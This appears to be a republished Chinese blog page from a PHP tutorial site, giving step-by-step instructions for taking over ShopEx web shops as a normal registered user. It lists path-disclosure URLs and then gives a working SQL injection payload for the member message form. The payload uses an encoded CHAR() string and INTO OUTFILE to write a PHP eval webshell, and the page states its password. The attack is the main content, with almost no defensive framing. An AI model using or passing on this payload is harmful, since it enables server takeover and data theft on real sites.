网站地图    收藏   

主页 > 后端 > 网站安全 >

shopex前台普通用户getshell最新漏洞 - 网站安全 -

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 利用方法:第一个:想办法找到目标网站的绝对路径http://www.wooyun.in/install/svinfo.php?phpinfo=truehttp://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat......

利用方法:

第一个:想办法找到目标网站的绝对路径


http://www.wooyun.in/install/svinfo.php?phpinfo=true
http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.2cto.com /core/api/site/2.0/api_b2b_2_0_goodstype.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_brand.php shopex存在很多爆路径的漏洞,请自行研究。 第二个:注册一个普通用户 http://www.wooyun.in/?passport-signup.html 第三个: 发送消息
 

http://www.wooyun.in/?member-send.html

 

\

代码

	wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

 

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

shell图

 

 

\

本文地址:http://www.wooyun.in/post/shopexgetshell.html

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论